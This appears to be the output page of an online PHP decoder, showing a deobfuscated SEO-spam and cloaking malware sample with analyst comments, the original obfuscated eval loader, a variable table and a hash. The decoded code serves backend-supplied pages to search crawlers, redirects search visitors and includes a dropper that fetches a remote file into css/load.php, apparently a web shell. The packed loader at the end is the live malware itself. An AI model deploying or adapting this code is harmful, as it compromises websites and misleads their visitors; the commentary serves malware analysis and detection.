
PHP Decode

<?php $YTyiNlXPSZp='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$YTyiNlXPSZ..

Decoded Output

<?php error_reporting(0);
// Analyst summary (decoded sample): SEO-spam / cloaking agent. The statements from here
// down to the function definitions run on every request that reaches this file.
// Error reporting and error display are switched off, the time limit is raised to
// 3600 seconds and client disconnects are ignored.
@ini_set('display_errors', 0);
@set_time_limit(3600);
@ignore_user_abort(1);
// Campaign/group identifier; sent to the backend as "groupid" when the URI supplies none.
$gojj = '282';
// Dropper trigger: a request with ac=write calls write() (defined further down), prints
// "write done!" and stops. The parameter value is the only condition on this branch, so
// "ac=write" in access-log query strings is a useful hunting string.
@$action = $_GET['ac'] ? $_GET['ac'] : "";
if ($action != "" && $action == "write") {
    write();
    echo "write done!";
    exit();
}
// sprintf() templates for the generated sitemaps. $smframe/$smitem form a urlset whose
// entries each carry an hreflang="ja" alternate link; $mainsm/$mainsmitem form a
// sitemap index pointing at sitemap<N>.xml on the requesting host.
$smframe = '<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
      xmlns:xhtml="http://www.w3.org/1999/xhtml">
%s</urlset>';
$smitem = '    <url>
        <loc>%s</loc>
        <xhtml:link rel="alternate" hreflang="ja" href="%s"/>
    </url>' . "
";
$mainsm = '<?xml version="1.0" encoding="UTF-8"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
%s</sitemapindex>';
$mainsmitem = '    <sitemap>
        <loc>%s://%s/sitemap%d.xml</loc>
    </sitemap>' . "
";
// Request fingerprint. The visitor's Accept-Language (first 4 bytes), Referer and
// User-Agent, the Host header and the client IP are copied into $header, which is
// passed to urlx() as the HTTP header list on calls to the backend host.
$lang = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 4) : "";
$ur = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : "";
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : "";
$host = $_SERVER["HTTP_HOST"];
$uri = $_SERVER["REQUEST_URI"];
$ip = clientip();
$http = https();
$header = array('User-Agent: ' . $ua, 'Lang: ' . $lang, 'Referer: ' . $ur, 'Http-Host: ' . $host, 'Remote-Addr: ' . $ip);
// Base POST body: the compromised site's host name and scheme.
$postdata = 'shost=' . $host . '&proto=' . $http;
// When the request URI contains ".php?", the text after it becomes the virtual path and
// $u_pre keeps the "SCRIPT.php?" prefix for link building; presumably this lets the
// routes below work on hosts without URL rewriting (not confirmed by this page).
$u_pre = "/";
if (strstr($uri, ".php?")) {
    $ta = explode(".php?", $uri);
    $u_pre = $ta[0] . ".php?";
    $uri = "/" . $ta[1];
}
// Base URL that later replaces "scheme://host/" in everything echoed to the client.
$host_u = $http . "://" . $host . $u_pre;
// Route /pingsitemap<suffix>.xml: submits this site's generated sitemap URLs to the
// google.co.jp ping endpoint and echoes each ping URL followed by the response body.
if (@preg_match('#^/pingsitemap(.*?).xml$#i', $uri, $amu)) {
    $result = '';
    // Empty suffix, or a suffix ending in "<digits>-": ask the backend for a sitemap count.
    if ($amu[1] === '' || @preg_match('#(\d+)-$#', $amu[1], $samu)) {
        // groupid is taken from the URI digits when present, otherwise from $gojj.
        $postdata.= ($samu[1] == '') ? '&groupid=' . $gojj : '&groupid=' . $samu[1];
        $ts = strval(time());
        array_push($header, 'timestamp: ' . $ts);
        // "xdoim" = crc32(timestamp, newline, POST body): a plain checksum. The
        // timestamp/xdoim header pair is a network indicator for this sample's backend calls.
        array_push($header, 'xdoim: ' . crc32($ts . '
' . $postdata));
        // Plain-HTTP POST to the backend host returned by gets().
        $content = trim(urlx('http://' . gets() . '/sitemap.xml', $header, $postdata . '&http=' . $http));
        if ($content === '') {
            exit();
        }
        if (@preg_match('#^(\d)*#', $content)) {
            // intval() of the response is the loop bound: one ping per sitemap<suffix><i>.xml.
            for ($i = 1;$i <= intval($content);$i++) {
                $pgurl = sprintf('https://www.google.co.jp/ping?sitemap=%s' . 'sitemap%s%d.xml', $host_u, $samu[0], $i);
                $respbody = urlx($pgurl);
                $result.= $pgurl . $respbody;
            }
        }
    } else {
        // Any other suffix: ping the single sitemap<suffix>.xml.
        $pgurl = sprintf('https://www.google.co.jp/ping?sitemap=%s' . 'sitemap%s.xml', $host_u, $amu[1]);
        $respbody = urlx($pgurl);
        $result.= $pgurl . $respbody;
    }
    echo $result;
    exit();
}
// Route /sitemap<suffix>.xml: serves sitemap XML whose content comes from the backend,
// so the compromised host advertises backend-chosen URLs under its own name.
if (@preg_match('#^/sitemap(.*?).xml$#i', $uri, $amu)) {
    $postdata = 'shost=' . $host . '&http=' . $http;
    // groupid: digits before a trailing "-" in the suffix, otherwise the built-in $gojj.
    if (@preg_match('#(\d+)-$#', $amu[1], $samu)) {
        $postdata.= '&groupid=' . $samu[1];
    } else {
        $postdata.= '&groupid=' . $gojj;
    }
    $ts = strval(time());
    array_push($header, 'timestamp: ' . $ts);
    // Same timestamp + crc32 "xdoim" header pair as the other backend calls in this file.
    array_push($header, 'xdoim: ' . crc32($ts . '
' . $postdata));
    // Index requests go to /sitemap.xml on the backend, others to /sitemap/<suffix>.
    $content = trim(urlx('http://' . gets() . '/sitemap' . (($amu[1] == '' || $samu[1] != '') ? '.xml' : '/' . $amu[1]), $header, $postdata));
    if ($content === '') {
        exit();
    }
    @header('Content-type: text/xml');
    // Index case: intval() of the response is the number of <sitemap> entries emitted.
    if ((($amu[1] === '' || $samu[1] != '')) && @preg_match('#^(\d)*#', $content)) {
        $xml = '';
        for ($i = 1;$i <= intval($content);$i++) {
            $xml.= sprintf($mainsmitem, $http, $host, $i, date('Y-m-d\TH:i:sP', time()));
        }
        $outstr = sprintf($mainsm, $xml);
        $outstr = str_replace($http . "://" . $host . "/", $host_u, $outstr);
        echo $outstr;
        exit();
    }
    // Otherwise each line of the response is a path; it is placed into a <url> entry as
    // received (no escaping or validation is applied here).
    $ids = explode("
", $content);
    $smbody = '';
    foreach ($ids as $v) {
        $purl = $http . '://' . $host . '/' . $v;
        $smbody.= sprintf($smitem, $purl, $purl);
    }
    $outstr = sprintf($smframe, $smbody);
    $outstr = str_replace($http . "://" . $host . "/", $host_u, $outstr);
    echo $outstr;
    exit();
}
// Route /getver: forwards the request to the same path on the backend and echoes the
// reply followed by the group id ($gojj) and the backend host name from gets().
// Looks like an operator status/version probe (purpose inferred from the path name).
if (@preg_match('#^/getver$#i', $uri, $amu)) {
    $ts = strval(time());
    array_push($header, 'timestamp: ' . $ts);
    array_push($header, 'xdoim: ' . crc32($ts . '
' . $postdata));
    $cnt = trim(urlx('http://' . gets() . $amu[0], $header, $postdata));
    echo ($cnt === false) ? 'fail' . gets() : $cnt . $gojj . gets();
    exit();
}
// Marker route: any URI containing the literal 10001abcaa55atesta5 fetches that path from
// the backend with get() and echoes the reply plus group id and backend host. Both this
// literal and "/getver" are distinctive strings to search for in web access logs.
if (strstr($uri, "10001abcaa55atesta5")) {
    $cnt = trim(get('http://' . gets() . "/10001abcaa55atesta5"));
    echo ($cnt === false) ? 'fail' . gets() : $cnt . $gojj . gets();
    exit();
}
// Cloaking: only requests whose User-Agent matches google|yahoo|bing|craft|Crawler enter
// this branch and are answered with a page fetched from the backend. Requests with other
// User-Agents skip it, so comparing the response for a crawler User-Agent with the
// response for a browser User-Agent is a practical check for this behaviour.
if (@preg_match('#google|yahoo|bing|craft|Crawler#i', $ua)) {
    $pdt = $postdata . '&http=' . $http . '&groupid=' . $gojj;
    // URIs ending in "<letters>-<digits>.html": page content from /bot/page.
    if (@preg_match('#([a-z]+)-(\d+)?(.html)$#i', $uri, $amu)) {
        // hpid: the slug is reversed with strrev() and "<letter><tld-word>..." is rewritten
        // to ".<tld-word>"; this looks like a domain name carried reversed in the slug
        // (TODO confirm against live traffic).
        $pdt.= sprintf('&hpid=%s-%s', preg_replace('/[a-zI](xyz|buzz|top|online|store|club|shop|biz|space|fun|site).*$/', ".$1", strrev($amu[1])), $amu[2]);
        $outstr = @trim(urlx(sprintf('http://%s/bot/page?' . $pdt, gets()), $header, $pdt, 1));
        $outstr = str_replace($http . "://" . $host . "/", $host_u, $outstr);
        echo $outstr;
        exit();
    // URIs ending in "cate/<letters>-<digits>": category listing from /bot/cate.
    } elseif (@preg_match('#cate\/([a-z]+)-(\d+)$#i', $uri, $bmu)) {
        $outstr = @trim(urlx(sprintf('http://%s/bot/cate?' . $pdt, gets()), $header, $pdt . '&host=' . preg_replace('/[a-zI](xyz|buzz|top|online|store|club|shop|biz|space|fun|site).*$/', ".$1", strrev($bmu[1])) . '&cateid=' . $bmu[2], 1));
        $outstr = str_replace($http . "://" . $host . "/", $host_u, $outstr);
        echo $outstr;
        exit();
    // Every other crawler request: content from /bot/home, with the requested URI attached.
    } else {
        $outstr = @trim(urlx(sprintf('http://%s/bot/home?' . $pdt . '&uri=' . $uri, gets()), $header, $pdt, 1));
        $outstr = str_replace($http . "://" . $host . "/", $host_u, $outstr);
        echo $outstr;
        exit();
    }
}
// Conditional redirect: a request whose Referer matches one of the listed search engines
// and whose URI ends in "<letters>-<digits>" (optionally ".html") is sent elsewhere.
// The target is whatever the backend's /bot/302 endpoint returns; it goes into the
// Location header as received. The visitor's IP is included in the POST body.
if (@preg_match('#google.co.jp|google.com|yahoo.co.jp|yahoo.co|bing.com|ask.com|aol.com|aol.jp#i', $ur) && @preg_match('#([a-zI]+)-(\d+)(.html)?$#i', $uri)) {
    if (substr($uri, -5) != ".html") {
        $uri = $uri . ".html";
    }
    $pdt = $postdata . '&groupid=' . $gojj . '&uri=' . $uri . '&ip=' . $ip;
    $purl = urlx(sprintf('http://%s/bot/302?' . $pdt . '&uri=' . $uri, gets()), $header, $pdt, 1);
    @header('Location: ' . $purl);
    exit();
}
/**
 * Dropper / persistence step, reached through the ac=write request parameter.
 *
 * Fetches two remote files over plain HTTP with get() and writes them, unchecked, to
 * css/.htaccess and css/load.php relative to the working directory, creating css/
 * (mode 0755) when it is missing. The base64 literals decode to (defanged):
 *   hxxp://hello[.]firstguide[.]xyz/mm2.txt           -> css/load.php
 *   hxxp://hello[.]firstguide[.]xyz/shl/htaccess.txt  -> css/.htaccess
 * load.php therefore contains whatever that host returns at fetch time; the variable
 * name suggests a web shell, but its content is not shown on this page.
 *
 * Triage: look for css/load.php and css/.htaccess beside any copy of this file, and for
 * outbound requests to the host above in proxy or DNS logs.
 */
function write() {
    $shell_load = get(base64_decode("aHR0cDovL2hlbGxvLmZpcnN0Z3VpZGUueHl6L21tMi50eHQ="));
    $new_ht_content = get(base64_decode("aHR0cDovL2hlbGxvLmZpcnN0Z3VpZGUueHl6L3NobC9odGFjY2Vzcy50eHQ="));
    if (!is_dir("css")) {
        mkdir("css", 0755, true);
    }
    // The existing .htaccess is made writable before it is overwritten.
    @chmod("css/.htaccess", 0755);
    file_put_contents("css/.htaccess", $new_ht_content);
    file_put_contents("css/load.php", $shell_load);
}
/**
 * cURL helper used for the backend calls and the sitemap pings.
 *
 * @param string      $url      Target URL.
 * @param array|null  $header   Extra HTTP header lines, set when not null.
 * @param string|null $postdata Request body; when not null the request is sent as POST.
 * @param mixed       $gz       Any non-null value asks for gzip/deflate encoding.
 * @return string|bool Result of curl_exec(): the response body, or false on failure.
 */
function urlx($url, $header = null, $postdata = null, $gz = null) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    // Redirects are followed.
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    if (!($gz === null)) {
        curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
    }
    // For https URLs certificate and host-name verification are both switched off.
    if (stripos($url, "https:") === 0) {
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
    }
    if (!($header === null)) {
        curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
    }
    if (!($postdata === null)) {
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
    }
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body;
}
/**
 * Downloads a URL, trying file_get_contents() first and cURL second.
 *
 * The cURL fallback runs whenever the first attempt yields a falsy value (failure or an
 * empty body); having both paths means the fetch can still work on hosts where one of
 * the two mechanisms is unavailable.
 *
 * @param string $url URL to fetch.
 * @return string|bool Body of the response, or the falsy result of the last attempt.
 */
function get($url) {
    // Warnings from a failed or disabled URL fopen are suppressed.
    $contents = @file_get_contents($url);
    if (!$contents) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $contents = curl_exec($ch);
        curl_close($ch);
    }
    return $contents;
}
/**
 * Returns the backend host name used by every urlx()/get() call to "http://<host>/...".
 *
 * The base64 literal decodes to seo28-2[.]startgreatseo[.]com (defanged). Together with
 * the raw base64 string itself, this is the main network and file-content indicator
 * in the sample.
 *
 * @return string Host name without scheme.
 */
function gets() {
    return base64_decode("c2VvMjgtMi5zdGFydGdyZWF0c2VvLmNvbQ==");
}
/**
 * Reports the scheme of the current request.
 *
 * Returns "https" when $_SERVER['HTTPS'] is non-empty and not "off", when the
 * X-Forwarded-Proto header equals "https", or when the Front-End-Https header is
 * non-empty and not "off"; otherwise "http". The two header-based checks read
 * request headers, so the result follows whatever the client or a proxy supplies.
 *
 * @return string "https" or "http".
 */
function https() {
    if ((!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') || (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off')) {
        return "https";
    }
    return "http";
}
/**
 * Returns the visitor's address from REMOTE_ADDR.
 *
 * The environment variable is tried first, then $_SERVER['REMOTE_ADDR']; a value equal
 * to "unknown" (case-insensitive) is skipped. When neither source yields a value the
 * function falls off the end and the caller receives null. The result is sent to the
 * backend in the Remote-Addr header and in the "ip" POST field of the redirect route.
 *
 * @return string|null Client IP address, or null when none is available.
 */
function clientip() {
    if (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
        return getenv('REMOTE_ADDR');
    } elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
        return $_SERVER['REMOTE_ADDR'];
    }
}


Original Code

<?php $YTyiNlXPSZp='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$YTyiNlXPSZp[(105/15)].$YTyiNlXPSZp[(26-1)].$YTyiNlXPSZp[(1*49)].$YTyiNlXPSZp[((10*1)+18)].$YTyiNlXPSZp[(14+22)].$YTyiNlXPSZp[(44+5)].$YTyiNlXPSZp[(44-13)].$YTyiNlXPSZp[(684/18)].$YTyiNlXPSZp[(23+4)].$YTyiNlXPSZp[(72-(33-7))].$YTyiNlXPSZp[(154/22)].$YTyiNlXPSZp[(11+25)].$YTyiNlXPSZp[(65-(62-31))].$YTyiNlXPSZp[(26-6)].$YTyiNlXPSZp[((27*2)-8)];$pHFdNhg9688=$YTyiNlXPSZp[(20-9)].$YTyiNlXPSZp[(2*4)].$YTyiNlXPSZp[(29*1)].$YTyiNlXPSZp[(160/4)];$MYtraky2482=$YTyiNlXPSZp[(8*5)].$YTyiNlXPSZp[((1+0)+2)].$YTyiNlXPSZp[(6+(1*(95/19)))].$YTyiNlXPSZp[(140/5)].$YTyiNlXPSZp[(522/18)].$YTyiNlXPSZp[(7*((7-3)-2))].$YTyiNlXPSZp[(2*14)].$YTyiNlXPSZp[(138/(2+4))].$YTyiNlXPSZp[(1029/(378/18))].$YTyiNlXPSZp[((2*189)/9)].$YTyiNlXPSZp[(12+(0+0))].$YTyiNlXPSZp[(31*1)].$YTyiNlXPSZp[(48/(36/12))].$YTyiNlXPSZp[(735/15)].$YTyiNlXPSZp[(0+7)].$YTyiNlXPSZp[(18+2)].$YTyiNlXPSZp[(18-(10/5))].$YTyiNlXPSZp[(735/15)].$YTyiNlXPSZp[(0+(2-(1*1)))].$YTyiNlXPSZp[(16-(3+(36/(0+18))))].$YTyiNlXPSZp[((167-23)/18)].$YTyiNlXPSZp[(0+(18-9))].$YTyiNlXPSZp[(1*3)].$YTyiNlXPSZp[(11*(1+(0/(78/13))))].$YTyiNlXPSZp[(2*7)].$YTyiNlXPSZp[(29*(0+1))].$YTyiNlXPSZp[(38-(8+9))].$YTyiNlXPSZp[(15*2)].$YTyiNlXPSZp[(45-11)].$YTyiNlXPSZp[(1*46)].$YTyiNlXPSZp[(1*(17+21))].$YTyiNlXPSZp[(78/3)].$YTyiNlXPSZp[(21+(77/11))].$YTyiNlXPSZp[(22+14)].$YTyiNlXPSZp[(343/(91/13))].$YTyiNlXPSZp[(1*1)].$YTyiNlXPSZp[(21-10)].$YTyiNlXPSZp[(22+(12/2))].$YTyiNlXPSZp[(180/20)].$YTyiNlXPSZp[(3+((0+0)*1))].$YTyiNlXPSZp[(686/(126/9))].$YTyiNlXPSZp[(61-(32-8))].$YTyiNlXPSZp[(476/17)].$YTyiNlXPSZp[((4-0)+22)].$YTyiNlXPSZp[(((23-(2*5))/13)-0)].$YTyiNlXPSZp[(7+(84/21))].$YTyiNlXPSZp[(28/2)].$YTyiNlXPSZp[(9-0)].$YTyiNlXPSZp[(3*1)];$UrR1094= 
"'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'";$JTx2343=$pHFdNhg9688;$JTx2343.=$UrR1094;$JTx2343.=$MYtraky2482;@$mEriqO3481=$q2866((''), ($JTx2343));@$mEriqO3481(); ?>

Function Calls

create_function 1
base64_decode 1
null 1
gzinflate 1

Variables

$x 'zVnpU9tIFv/sVOV/EIqIpETINgzZiYniUGCOKgeIMcnmYFWy1LZFdJVa5or..
$YTyiNlXPSZp y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je
$q2866 create_function
$b error_reporting(0); @ini_set('display_errors', 0); @set_ti..
$MYtraky2482 ";$a=base64_decode($x);$b=gzinflate($a);eval($b);
$a YSHTD6 P`*1`UEtZ-]>`]{j4S;%If~4jg)4i876A2=;Cb~gDqJ%@Vue_\X*R..
$JTx2343 $x="'zVnpU9tIFv/sVOV/EIqIpETINgzZiYniUGCOKgeIMcnmYFWy1LZFdJV..
$UrR1094 'zVnpU9tIFv/sVOV/EIqIpETINgzZiYniUGCOKgeIMcnmYFWy1LZFdJVa5or..
$mEriqO3481 None
$pHFdNhg9688 $x="

Stats

MD5 28b696f7a849a1148e76b0292d505c4a
Eval Count 2
Decode Time 132 ms